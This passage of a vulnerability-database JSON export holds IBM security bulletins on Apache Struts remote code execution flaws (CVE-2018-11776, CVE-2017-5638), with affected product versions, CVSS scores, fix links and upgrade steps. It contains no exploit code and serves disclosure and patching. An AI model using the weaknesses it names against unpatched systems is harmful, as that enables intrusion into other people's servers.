\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Spectrum LSF Explorer 10.1\n\nIBM Spectrum LSF Explorer 10.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**IBM Spectrum LSF Explorer10.1 & 10.2**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Explorer installed environment.\n 3. How to find replace files location\n * Navigate to Explorer installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "href": "https://www.ibm.com/support/pages/node/729453", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:34", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Platform Application Center.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nPlatform Application Center 9.1.5\n\nPlatform Application Center 9.1.4.2\n\nPlatform Application Center 9.1.4.1\n\nPlatform Application Center 9.1.4\n\nPlatform Application Center 9.1.3\n\nPlatform Application Center 9.1.2\n\nPlatform Application Center 9.1.1\n\nPlatform Application Center 9.1\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nPlatform Application Center\n\n| \n\n_9.1.5_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.3_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**Platform Application Center 9.1.5, 9.1.4.2, 9.1.4.1, 9.1.4, 9.1.3, 9.1.2, 9.1.1, 9.1**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to PAC installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Platform Application Center", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "href": "https://www.ibm.com/support/pages/node/729451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T17:45:43", "description": "## Summary\n\nA vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and 9100 family products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: ** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM FlashSystem 9100 Family \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud\n\nAll products are affected when running supported versions 7.5 to 8.2.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher:\n\n7.5.0.13\n\n7.8.1.8\n\n8.1.3.3\n\n8.2.0.2\n\n8.2.1.0\n\n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+%282145%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+%282076%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem 9100 Family Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+9100+family&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>)\n\nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-03-29T01:48:02", "id": "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "href": "https://www.ibm.com/support/pages/node/741137", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:28", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.1.4-10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.1.4 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p413_Apache-Struts-Vulnerability-Fix&source=SAR&function=fixId&parent=IBM%20Security \nIBM Security Guardium | 10.5 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p512_Sep-24-2018&source=SAR&function=fixId&parent=IBM%20Security \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T04:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-28T04:30:01", "id": "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "href": "https://www.ibm.com/support/pages/node/732783", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:46:41", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 9.5.0 \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP3_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP6_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T15:25:01", "type": "ibm", "title": "Security Bulletin: Apache Struts Vulnerability Can Affect IBM Sterling Order Management (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-17T15:25:01", "id": "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "href": "https://www.ibm.com/support/pages/node/730273", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:44:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected:9840-AE1 and 9843-AE1\n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1\n\nSupported storage node code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\nSupported controller node code versions which are affected\n\n * VRMFs prior to 7.8.1.8\n * VRMFs prior to 8.1.3.4\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \n**Storage nodes**:\n\n9846-AE1 & 9848-AE1\n\n**Controller nodes**:\n\n9846-AC0, 9846-AC1, 9848-AC0, & 9848-AC1\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n_Controller Node VRMF_\n\n8.1 stream: 8.1.3.4\n\n7.8 stream: 7.8.1.8\n\n| N/A | FlashSystem V840 fixes for storage node are available @ IBM's Fix Central \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T15:05:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-02-18T15:05:01", "id": "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "href": "https://www.ibm.com/support/pages/node/735023", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 